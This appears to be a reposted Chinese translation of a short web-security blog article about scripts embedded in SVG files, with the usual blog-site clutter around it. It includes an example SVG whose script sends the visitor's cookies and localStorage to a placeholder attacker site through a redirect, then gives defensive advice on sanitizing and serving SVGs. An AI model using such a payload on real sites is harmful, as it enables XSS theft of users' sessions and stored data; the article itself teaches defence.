SVG中JavaScript

最新推荐文章于 2024-07-30 20:03:03 发布
最新推荐文章于 2024-07-30 20:03:03 发布
阅读量309 收藏
点赞数
文章标签: css cookie js svg https ViewUI
原文链接:https://davidwalsh.name/javascript-in-svgs
版权

SVG是用于创建自定义字体,动画,尺寸减小的图形等的出色工具。 它们既是HTML,又是图像,而且都很棒。 由于SVG提供的灵活性,许多网站已转向SVG,而不是JPG,GIF和PNG。

这种灵活性的一个例子是什么? 您是否知道可以将JavaScript直接嵌入到SVG文件中: 

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
<path d="M90,18c-90-45-115,102,0,69v-21l4-3h-23l-8,4h16v19c-80,15-65-106,2-63l-4,5l4-1z" fill="#CCC" stroke="#DDD" stroke-width="2" stroke-linejoin="round"/>
<path d="M87,15c-90-45-115,102,0,69v-21l4-3h-23l-8,4h16v19c-80,15-65-106,2-63l-4,5l4-1z" fill="#00F"/>
<script>
    alert("Hello world");
</script>
</svg>

这是一个很酷的功能,但是如果按原样嵌入到页面中,也是一个安全问题。 例如,如果用户使用以下代码将SVG上传到您的网站: 

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
<path d="M90,18c-90-45-115,102,0,69v-21l4-3h-23l-8,4h16v19c-80,15-65-106,2-63l-4,5l4-1z" fill="#CCC" stroke="#DDD" stroke-width="2" stroke-linejoin="round"/>
<path d="M87,15c-90-45-115,102,0,69v-21l4-3h-23l-8,4h16v19c-80,15-65-106,2-63l-4,5l4-1z" fill="#00F"/>
<script>
    //  BAD! Send the user's info to your website!
    const info = JSON.stringify(document.cookie) + JSON.stringify(localStorage);
    document.location = "https://mybadsite.tld/stolenInfo=" + info;
</script>
</svg>

...他们可以通过XSS窃取Cookie,存储空间和其他信息。 那是个问题。 防止这种情况的一种方法是将JavaScript剥离到SVG中,但是您也可以通过CSS嵌入<img>或作为background-image

<img src="/path/to/image.svg" />

当您使用<img>background-image ,将阻止执行JavaScript,从而使SVG相对安全! 但是,您仍然应该清除SVG中的不良内容,并从其他主机名提供它们,以免共享cookie!

翻译自: https://davidwalsh.name/javascript-in-svgs

cuozhun3051
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SVG使用JavaScript
cungui5726的博客
08-24 1283
Web developers use JavaScript to achieve many things in SVG, including animation, interaction, creating and modifying elements, but adding a script inside an SVG document comes with a few special cave...
svgjavascript交互
07-13
JavaScript,作为Web开发最常用的脚本语言,能够与SVG进行深入交互,实现动态效果和用户互动。本文将探讨SVGJavaScript交互的基础知识,以及如何利用它们来实现简单的文字路径特效。 1. SVG的基本结构 SVG图像...
javascript学习-SVG
qq_43368682的博客
07-31 2871
SVG简介 SVG是一种图像文件格式,它的英文全称为Scalable Vector Graphics,意思为可缩放的矢量图形。它是基于XML(Extensible Markup Language),由World Wide Web Consortium(W3C)联盟进行开发的。严格来说应该是一种开放标准的矢量图形语言,本质上是文本文件,体积较小,放大多少都不会失真。用户可以直接用代码来描绘图像,可以用任何文字处理工具打开SVG图像,通过改变部分代码来使图像具有交互功能,并可以随时插入到HTML通过浏览器来观
11. JS操作SVG
一名全栈开发工程师
05-14 776
在本文,我们将探讨如何使用JavaScriptSVG交互,实现动态的图形效果。
SVG_33_script脚本标签
知识搬运工,资料任你拿,包括书籍、电影、电视剧、网站、软件等,VX公人人人号:向前书局
06-01 555
知识点: script标签:一个SVG脚本元素等同于HTML的script元素,因此这个位置是面向脚本的(例如,ECMAScript)。 任何定义在script元素的函数拥有一个跨当前文档的全局范围。 本来我还想着,使用脚本控制的话,会更灵活。呐,今天script标签就来了。 使用script标签,我们就可以编写各种脚本,实现各种点击、滑动等高交互性的操作了。 其实之前把svg写在html文档也是可以的,但我更喜欢单独.svg格式。 以后更多的交互效果,期待。...
如何使用JavaScriptSVG元素进行交互
wsl3465205046的博客
04-19 1166
【代码】如何使用JavaScriptSVG元素进行交互。
Study JavaScriptJS操作SVG的一些知识》
傻大专栏
11-25 9537
前阵子学习了一下SVG(Scalable Vector Graphics),希望能借此弥补自己在图形艺术上的不足,当然最后也没有得到什么提高,不过也扩充了一些网页前段技术知识。通过做了一些小的设计项目,也发现SVG可以弥补一些HTML元素的不足,比如倾斜、弧线、动画、复用等等。 虽然SVG和HTML一样都属于XML的一种方言,一些基本的JavaScript对HTML的DOM操作都适用于SVG,但
gz.zip_javascript_svg
09-24
在IT行业JavaScriptSVG(Scalable Vector Graphics)是两个非常重要的技术。JavaScript是一种广泛应用于Web开发的脚本语言,而SVG则是一种用于创建矢量图形的标准格式。在这个名为"gz.zip_javascript_svg"的...
推荐10 款 SVG 动画的 JavaScript
10-24
以下是对标题和描述提到的10款SVG动画JavaScript库的详细说明: 1. **Vivus**:这是一个轻巧的JavaScript库,它可以将SVG图像转化为动态的、仿佛正在绘制的过程。Vivus不依赖任何外部库,只需引入.js文件并指定要...
javascriptsvg转图片代码组件,亲测有效;
09-23
JavaScript开发SVG(Scalable Vector Graphics)是一种用于绘制矢量图形的标记语言,它允许我们创建高质量、可缩放的图形。然而,在某些场景下,可能需要将SVG图形转换为传统的位图格式,如PNG或JPEG,以便于...
svg通用操作javascript
03-24
以上是JavaScriptSVG结合的一些基础操作,实际应用可能还需要结合CSS、动画框架(如Snap.svg)等进一步提升交互体验。通过不断学习和实践,开发者可以充分利用SVGJavaScript的特性,创建出富有创意和交互性的...
如何在 JavaScript 导入 SVG 文件
很酷的站长的博客
12-10 2614
可缩放矢量图形,有时称为 SVG,是一种 2D 图形或图像文件。为了 创建视觉效果,SVG文件采用数学公式和一组关于形状,线条的准则, 和其他功能。SVG 只是指定颜色应如何呈现的 XML 代码,其 每个表单都应相对于文件的其他形状显示,以及形状应如何显示 显示。SVG 和其他一些矢量图形与依赖于 像素来传达视觉数据,如 JPEG 或 PNG 文件SVG 文件可以无限缩放。SVG 文件比光栅图像具有显着优势,因为 您可以根据需要放大它们并多次调整它们的大小,而不会失去清晰度。
如何调用SVG 内部的js方法
姚家湾博客
05-08 625
如何调用SVG 内部的javascript 代码
Javascriptcanvas与svg详解
最新发布
警警的博客
07-30 782
SVG是一种强大的图形格式,可以在网页创建高质量的矢量图形。通过结合HTML和JavaScript,你可以创建动态和交互式的SVG图形,这些图形可以在各种设备和屏幕尺寸上保持清晰度和可访问性。[Cesium]加载GeoJSON并自定义设置符号(以点要素为例)_cesium.geojsondatasource.load 添加图标-CSDN博客。
SVG 文件调用javascript代码
Pipi0714的专栏
07-01 6757
SVG文件调用Javascript脚本有三种方式1、在SVG内部嵌入脚本,如下:function showmsg(){alert("you had clicked the green rect");}]]> showmsg函数嵌入在svg文件内部。 2、导入.js文件 3、在执行html的脚本分两种情况,在IE6直接调用脚本例如:在html的函数
SVG基础以及使用Javascript DOM操作SVG
热门推荐
多多
06-30 3万+
简介在HTML使用SVG " style="">分组元素 解决text文本排版问题 通过Javascript DOM控制SVG 设置文本获取元素高宽和坐标事件处理自定义的z-index层级属性更多DOM API为什么不使用jQuery? 简介 首先要明白SVG是基于XML格式定义图像的一种技术,并且是矢量的,也就是说在不同分辨率下都显示得很好。想到这里,有
基于svg.js实现可编辑的图像(1)
切图工的博客
01-04 1万+
一、关于svg.js 首先是svg.js的git地址https://github.com/svgdotjs/svg.js svg.js主要用于在页面绘制svg图像,关于svg图像可以参见w3school的介绍详细地址如下:http://www.w3school.com.cn/svg/svg_intro.asp 二、具体实现 大致的功能如下: 实现可以拖动,
SVGJavaScript交互:内部脚本与外部脚本
"本文主要探讨SVGJavaScript的交互,包括如何在SVG使用JavaScript脚本,以及SVG DOM的常用属性和方法。" 在SVG(可缩放矢量图形)与JavaScript的交互,我们可以实现SVG图形的动态性和交互性。这篇文章着重...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值